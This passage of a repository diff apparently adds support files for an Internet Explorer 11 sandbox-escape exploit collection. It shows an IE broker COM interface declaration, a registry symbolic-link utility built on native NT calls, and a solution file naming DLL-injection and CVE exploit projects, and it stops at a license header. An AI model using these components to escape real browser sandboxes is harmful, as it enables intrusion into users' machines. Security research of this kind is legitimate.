virtual HRESULT STDMETHODCALLTYPE RemoveHomePage(HWND *, int) = 0;
virtual HRESULT STDMETHODCALLTYPE FixInternetSecurity(HWND *, int *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowManageAddons(HWND *, DWORD, _GUID *, DWORD, int) = 0;
virtual HRESULT STDMETHODCALLTYPE CacheExtFileVersion(_GUID const &, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowAxApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE SendLink(ITEMIDLIST_ABSOLUTE const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE SendPage(HWND *, IDataObject *) = 0;
virtual HRESULT STDMETHODCALLTYPE NewMessage(void) = 0;
virtual HRESULT STDMETHODCALLTYPE ReadMail(HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE SetAsBackground(LPCWSTR) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowSaveBrowseFile(HWND *, WORD const *, WORD const *, int, int, WORD * *, DWORD *, DWORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE SaveAsComplete(void) = 0;
virtual HRESULT STDMETHODCALLTYPE SaveAsFile(void) = 0;
virtual HRESULT STDMETHODCALLTYPE StartImportExportWizard(int, HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE EditWith(HWND *, DWORD, HANDLE, DWORD, LPCWSTR, LPCWSTR, LPCWSTR) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowSaveImage(HWND *, WORD const *, DWORD, WORD * *) = 0;
virtual HRESULT STDMETHODCALLTYPE SaveImage(WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE CreateShortcut(/* _internet_shortcut_params */ void*, int, HWND *, WORD *, int) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowSynchronizeUI(void) = 0;
virtual HRESULT STDMETHODCALLTYPE OpenFolderAndSelectItem(WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE DoGetOpenFileNameDialog(/* _SOpenDlg */ void *) = 0;
virtual HRESULT STDMETHODCALLTYPE DoGetLocationPlatformConsent(HWND *, DWORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowSaveFileName(HWND *, WORD const *, WORD const *, WORD const *, WORD const *, DWORD, WORD *, DWORD, WORD const *, WORD * *) = 0;
virtual HRESULT STDMETHODCALLTYPE SaveFile(HWND *, DWORD, DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE VerifyTrustAndExecute(HWND *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetFeedByUrl(WORD const *, WORD * *) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerAddToFavoritesEx(HWND *, ITEMIDLIST_ABSOLUTE const *, WORD const *, DWORD, IOleCommandTarget *, WORD *, DWORD, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE Subscribe(HWND *, WORD const *, WORD const *, int, int, int) = 0;
virtual HRESULT STDMETHODCALLTYPE MarkAllItemsRead(WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE MarkItemsRead(WORD const *, DWORD *, DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE Properties(HWND *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE DeleteFeedItem(HWND *, WORD const *, DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE DeleteFeed(HWND *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE DeleteFolder(HWND *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE Refresh(WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE MoveFeed(HWND *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE MoveFeedFolder(HWND *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE RenameFeed(HWND *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE RenameFeedFolder(HWND *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE NewFeedFolder(LPCWSTR) = 0;
virtual HRESULT STDMETHODCALLTYPE FeedRefreshAll(void) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowFeedAuthDialog(HWND *, WORD const *, /* FEEDTASKS_AUTHTYPE */ DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowAddSearchProvider(HWND *, WORD const *, WORD const *, int) = 0;
virtual HRESULT STDMETHODCALLTYPE InitHKCUSearchScopesRegKey(void) = 0;
virtual HRESULT STDMETHODCALLTYPE DoShowDeleteBrowsingHistoryDialog(HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE StartAutoProxyDetection(void) = 0;
virtual HRESULT STDMETHODCALLTYPE EditAntiPhishingOptinSetting(HWND *, DWORD, int *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowMyPictures(void) = 0;
virtual HRESULT STDMETHODCALLTYPE ChangeIntranetSettings(HWND *, int) = 0;
virtual HRESULT STDMETHODCALLTYPE FixProtectedModeSettings(void) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowAddService(HWND *, WORD const *, WORD const *, int) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowAddWebFilter(HWND *, WORD const *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE DoBrowserRegister() = 0;
virtual HRESULT STDMETHODCALLTYPE DoBrowserRevoke(long) = 0;
virtual HRESULT STDMETHODCALLTYPE DoOnNavigate(long, VARIANT *) = 0;
virtual HRESULT STDMETHODCALLTYPE AddDesktopComponent(WORD *, WORD *, VARIANT *, VARIANT *, VARIANT *, VARIANT *) = 0;
virtual HRESULT STDMETHODCALLTYPE DoOnCreated(long, IUnknown *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetShellWindows(IUnknown * *) = 0;
virtual HRESULT STDMETHODCALLTYPE CustomizeSettings(short, short, WORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE OnFocus(int) = 0;
virtual HRESULT STDMETHODCALLTYPE IsProtectedModeUrl(LPCWSTR) = 0;
virtual HRESULT STDMETHODCALLTYPE DoDiagnoseConnectionProblems(HWND *, WORD *, WORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE PerformDoDragDrop(HWND *, /* IEDataObjectWrapper */ void *, /* IEDropSourceWrapper */ void *, DWORD, DWORD, DWORD *, long *) = 0;
virtual HRESULT STDMETHODCALLTYPE TurnOnFeedSyncEngine(HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE InternetSetPerSiteCookieDecisionW(WORD const *, DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE SetAttachmentUserOverride(LPCWSTR) = 0;
virtual HRESULT STDMETHODCALLTYPE WriteClassesOfCategory(_GUID const &, int, int) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerSetFocus(DWORD, HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconA(DWORD, /* _BROKER_NOTIFYICONDATAA */ void *) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconW(DWORD, /* _BROKER_NOTIFYICONDATAW */ void*) = 0;
virtual HRESULT STDMETHODCALLTYPE DisplayVirtualizedFolder(void) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerSetWindowPos(HWND *, HWND *, int, int, int, int, DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE WriteUntrustedControlDetails(_GUID const &, WORD const *, WORD const *, DWORD, BYTE *) = 0;
virtual HRESULT STDMETHODCALLTYPE SetComponentDeclined(char const *, char const *) = 0;
virtual HRESULT STDMETHODCALLTYPE DoShowPrintDialog(/* _BROKER_PRINTDLG */ void*) = 0;
virtual HRESULT STDMETHODCALLTYPE NavigateHomePages(void) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowAxDomainApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE ActivateExtensionFromCLSID(HWND *, WORD const *, DWORD, DWORD, DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateNewIEWindow(DWORD, _GUID const &, void * *, int, DWORD, int, int) = 0;
virtual HRESULT STDMETHODCALLTYPE BeginFakeModalityForwardingToTab() = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerEnableWindow(int, int *) = 0;
virtual HRESULT STDMETHODCALLTYPE EndFakeModalityForwardingToTab(HWND *, long) = 0;
virtual HRESULT STDMETHODCALLTYPE CloseOldTabIfFailed(void) = 0;
virtual HRESULT STDMETHODCALLTYPE EnableSuggestedSites(HWND *, int) = 0;
virtual HRESULT STDMETHODCALLTYPE SetProgressValue(HWND *, DWORD, DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerStartNewIESession(void) = 0;
virtual HRESULT STDMETHODCALLTYPE CompatDetachInputQueue(HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE CompatAttachInputQueue(void) = 0;
virtual HRESULT STDMETHODCALLTYPE SetToggleKeys(DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE RepositionInfrontIE(HWND *, int, int, int, int, DWORD) = 0;
//virtual HRESULT STDMETHODCALLTYPE ReportShipAssert(DWORD, DWORD, DWORD, WORD const *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowOpenSafeOpenDialog(HWND *, /* _BROKER_SAFEOPENDLGPARAM */ void *, DWORD *, DWORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerAddSiteToStart(HWND *, WORD *, WORD const *, long, DWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE SiteModeAddThumbnailButton(DWORD *, HWND *, WORD *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE SiteModeAddButtonStyle(int *, HWND *, DWORD, WORD *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE IsSiteModeFirstRun(int, WORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE IsImmersiveSiteModeFirstRun(int, WORD const *, WORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetImmersivePinnedState(DWORD, int, int *) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerDoSiteModeDragDrop(DWORD, long *, DWORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE EnterUILock(long) = 0;
virtual HRESULT STDMETHODCALLTYPE LeaveUILock(long) = 0;
virtual HRESULT STDMETHODCALLTYPE CredentialAdd(/* _IECREDENTIAL */ void *) = 0;
virtual HRESULT STDMETHODCALLTYPE CredentialGet(WORD const *, WORD const *, /*_IECREDENTIAL */ void * *) = 0;
virtual HRESULT STDMETHODCALLTYPE CredentialFindAllByUrl(WORD const *, DWORD *, /* _IECREDENTIAL */ void * *) = 0;
virtual HRESULT STDMETHODCALLTYPE CredentialRemove(WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowOpenFile(HWND *, DWORD, DWORD, WORD *, WORD *, WORD const *, WORD const *, WORD const *, /* _OPEN_FILE_RESULT */ void * *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowImmersiveOpenFilePicker(HWND *, int, WORD const *, IUnknown * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
virtual HRESULT STDMETHODCALLTYPE RegisterFileDragDrop(HWND *, DWORD, unsigned char *) = 0;
virtual HRESULT STDMETHODCALLTYPE RevokeFileDragDrop(HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropA(HWND *, DWORD, char * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropW(HWND *, DWORD, WORD * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowEPMCompatDocHostConsent(HWND *, WORD const *, WORD const *, int *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetModuleInfoFromSignature(WORD const *, WORD * *, DWORD, WORD * *, WORD * *, WORD * *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShellExecWithActivationHandler(HWND *, LPCWSTR, LPCWSTR, int, /* _MSLAUNCH_HANDLER_STATUS */ void *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShellExecFolderUri(LPCWSTR) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowIMMessageDialog(HWND *, WORD const *, WORD const *, /* _IM_BUTTON_LABEL_ID */ void *, DWORD, DWORD, DWORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetFileHandle(HWND *, BSTR filename, BYTE * hash, DWORD hashlen, HANDLE*) = 0;
virtual HRESULT STDMETHODCALLTYPE MOTWCreateFileW(DWORD dwProcessId, BSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, int dwOpenMode, DWORD dwFlagsAndAttributes, ULONGLONG* h, DWORD *error) = 0;
virtual HRESULT STDMETHODCALLTYPE MOTWFindFileW() = 0;
virtual HRESULT STDMETHODCALLTYPE MOTWGetFileDataW() = 0;
virtual HRESULT STDMETHODCALLTYPE WinRTInitializeWithWindow(IUnknown *, HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE DoProvisionNetworks(HWND *, WORD const *, DWORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetAccessibilityStylesheet(DWORD, unsigned __int64 *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetAppCacheUsage(WORD const *, unsigned __int64 *, unsigned __int64 *) = 0;
virtual HRESULT STDMETHODCALLTYPE HiddenTabRequest(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* _HIDDENTAB_REQUEST_INFO */ void *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetMaxCpuSpeed(DWORD *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetProofOfPossessionTokensForUrl(WORD const *, DWORD *, /* _IEProofOfPossessionToken */ void * *) = 0;
virtual HRESULT STDMETHODCALLTYPE GetLoginUrl(LPWSTR*) = 0;
virtual HRESULT STDMETHODCALLTYPE ScheduleDeleteEncryptedMediaData() = 0;
virtual HRESULT STDMETHODCALLTYPE IsDeleteEncryptedMediaDataPending() = 0;
virtual HRESULT STDMETHODCALLTYPE GetFrameAppDataPathA() = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerHandlePrivateNetworkFailure() = 0;
};
_COM_SMARTPTR_TYPEDEF(IIEUserBroker, __uuidof(IIEUserBroker));
_COM_SMARTPTR_TYPEDEF(IShdocvwBroker, __uuidof(IShdocvwBroker));

161
external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp vendored Executable file
View File

@ -0,0 +1,161 @@
/*--------------------------------------------------------------------
REGLN - Manage Windows Rregistry Links V20R0
======================================================================
Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
The following Copyrights apply:
Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net>
Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com>
License:
This software is distributed under the terms and conditions of
GPL - GNU General Public License. The software is provided AS
IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no
responsibility for any damages or consequences of usage of this
software. For more information, please read the attached GPL.TXT.
--------------------------------------------------------------------*/
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <wchar.h>
#include "regln.h"
#include "Utils.h"
int checkargs(int argc, char *argv[]);
char *win2ntapi(char *win, int len);
int ntapi_init(void);
int usage(void);
static fNtCreateKey NtCreateKey;
static fNtDeleteKey NtDeleteKey;
static fNtSetValueKey NtSetValueKey;
int DeleteLink(LPCWSTR par_src)
{
DWORD disposition, status;
HANDLE hdl_nt_keyhandle;
UNICODE_STRING nt_keyname;
OBJECT_ATTRIBUTES nt_object_attributes;
ntapi_init();
nt_keyname.Buffer = par_src;
nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
nt_object_attributes.ObjectName = &nt_keyname;
nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE | REG_OPTION_OPEN_LINK_ATTR;
nt_object_attributes.RootDirectory = NULL; //
nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type
nt_object_attributes.SecurityQualityOfService = NULL; //
nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
// open link
status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE, &disposition);
if (status == 0) {
DebugPrintf("DEBUG: %ls opened successfully.\n", par_src);
// delete
status = NtDeleteKey(hdl_nt_keyhandle);
if (status == 0) {
DebugPrintf("DEBUG: %ls deleted successfully.\n", par_src);
}
else {
DebugPrintf("ERROR: Link deletion failed. [Step 2] [Error %08X]\n", status);
return 1;
}
}
else {
DebugPrintf("ERROR: Link deletion failed. [Step 1] [Error %08X]\n", status);
return 1;
}
return 0;
};
int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile)
{
DWORD disposition, status;
HANDLE hdl_nt_keyhandle;
UNICODE_STRING nt_keyname, nt_valuename;
OBJECT_ATTRIBUTES nt_object_attributes;
ntapi_init();
nt_keyname.Buffer = par_src;
nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
nt_object_attributes.ObjectName = &nt_keyname;
nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE;
nt_object_attributes.RootDirectory = NULL; //
nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type
nt_object_attributes.SecurityQualityOfService = NULL; //
nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
// create the key
if (opt_volatile)
status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
else
status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
if (status == 0) {
DebugPrintf("DEBUG: Key %ls created successfully.\n", par_src);
// the real action is here:
nt_valuename.Buffer = REG_LINK_VALUE_NAME;
nt_valuename.Length = wcslen(REG_LINK_VALUE_NAME) * sizeof(WCHAR);
status = NtSetValueKey(hdl_nt_keyhandle, &nt_valuename, 0, REG_LINK, par_dst, wcslen(par_dst) * sizeof(WCHAR));
if (status == 0) {
DebugPrintf("DEBUG: Value REG_LINK:%ls=%ls set succesfully.\n", REG_LINK_VALUE_NAME, par_dst);
}
else {
DebugPrintf("ERROR: Link creation failed. [Step 2] [Error %08X]\n", status);
return 1;
}
}
else {
DebugPrintf("ERROR: Link creation failed. [Step 1] [Error %08X]\n", status);
return 1;
}
return 0;
}
int ntapi_init(void) {
#ifdef DEBUG
DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtCreateKey...\n");
#endif
if(!(NtCreateKey = (fNtCreateKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateKey" ))) {
DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
return 1;
}
#ifdef DEBUG
DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtDeleteKey...\n");
#endif
if(!(NtDeleteKey = (fNtDeleteKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtDeleteKey" ))) {
DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
return 1;
}
#ifdef DEBUG
DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtSetValueKey...\n");
#endif
if(!(NtSetValueKey = (fNtSetValueKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtSetValueKey" ))) {
DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
return 1;
}
return 0;
}

70
external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h vendored Executable file
View File

@ -0,0 +1,70 @@
/*--------------------------------------------------------------------
REGLN - Manage Windows Rregistry Links V20R0
======================================================================
Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
The following Copyrights apply:
Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net>
Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com>
License:
This software is distributed under the terms and conditions of
GPL - GNU General Public License. The software is provided AS
IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no
responsibility for any damages or consequences of usage of this
software. For more information, please read the attached GPL.TXT.
--------------------------------------------------------------------*/
#define REG_LINK_VALUE_NAME L"SymbolicLinkValue" // found by tenox
//#define REG_OPTION_CREATE_LINK 2 // this is defined in MSVC 2.0 but not after
#define REG_OPTION_OPEN_LINK_ATTR 0x100 // found by tommy
#define OBJ_CASE_INSENSITIVE 0x40
//
// Following definitions are generously provided by Mark Russinovitch
//
typedef struct _UNICODE_STRING {
WORD Length;
WORD MaximumLength;
PCWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
DWORD Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
DWORD Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
typedef DWORD (__stdcall *fNtCreateKey)(
HANDLE KeyHandle,
DWORD DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
DWORD TitleIndex,
PUNICODE_STRING Class,
DWORD CreateOptions,
PDWORD Disposition
);
typedef DWORD (__stdcall *fNtSetValueKey)(
HANDLE KeyHandle,
PUNICODE_STRING ValueName,
DWORD TitleIndex,
DWORD Type,
const void* Data,
DWORD DataSize
);
typedef DWORD (__stdcall *fNtDeleteKey)(
HANDLE KeyHandle
);

8
external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp vendored Executable file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// CommandUtils.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

15
external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h vendored Executable file
View File

@ -0,0 +1,15 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#include <tchar.h>
#include <Windows.h>
#include <strsafe.h>
#include <vector>
#include <string>
#include <sstream>

8
external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h vendored Executable file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

72
external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln vendored Executable file
View File

@ -0,0 +1,72 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.30501.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectDll", "InjectDll\InjectDll.vcxproj", "{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5045", "CVE-2013-5045\CVE-2013-5045.vcxproj", "{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CommonUtils", "CommonUtils\CommonUtils.vcxproj", "{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5046", "CVE-2013-5046\CVE-2013-5046.vcxproj", "{7A9AC14A-00BC-4A69-9B86-C80635606FEA}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0268", "CVE-2014-0268\CVE-2014-0268.vcxproj", "{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0257", "CVE-2014-0257\CVE-2014-0257.vcxproj", "{2A46841E-E3FC-42FF-BCDF-70F76E757E26}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|Win32.ActiveCfg = Debug|Win32
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.ActiveCfg = Debug|x64
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.Build.0 = Debug|x64
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|Win32.ActiveCfg = Release|Win32
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.ActiveCfg = Release|x64
{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.Build.0 = Release|x64
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.ActiveCfg = Debug|Win32
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.Build.0 = Debug|Win32
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.ActiveCfg = Debug|x64
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.Build.0 = Debug|x64
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.ActiveCfg = Release|Win32
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.Build.0 = Release|Win32
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.ActiveCfg = Release|x64
{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.Build.0 = Release|x64
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.ActiveCfg = Debug|Win32
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.Build.0 = Debug|Win32
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.ActiveCfg = Debug|x64
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.Build.0 = Debug|x64
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.ActiveCfg = Release|Win32
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.Build.0 = Release|Win32
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.ActiveCfg = Release|x64
{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.Build.0 = Release|x64
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|Win32.ActiveCfg = Debug|Win32
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.ActiveCfg = Debug|x64
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.Build.0 = Debug|x64
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|Win32.ActiveCfg = Release|Win32
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.ActiveCfg = Release|x64
{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.Build.0 = Release|x64
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|Win32.ActiveCfg = Debug|Win32
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.ActiveCfg = Debug|x64
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.Build.0 = Debug|x64
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|Win32.ActiveCfg = Release|Win32
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.ActiveCfg = Release|x64
{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.Build.0 = Release|x64
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.ActiveCfg = Debug|Win32
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.Build.0 = Debug|Win32
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.ActiveCfg = Debug|x64
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.Build.0 = Debug|x64
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.ActiveCfg = Release|Win32
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.Build.0 = Release|Win32
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.ActiveCfg = Release|x64
{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

107
external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp vendored Executable file
View File

@ -0,0 +1,107 @@
// This file is part of IE11SandboxEsacapes.
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// IE11SandboxEscapes is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
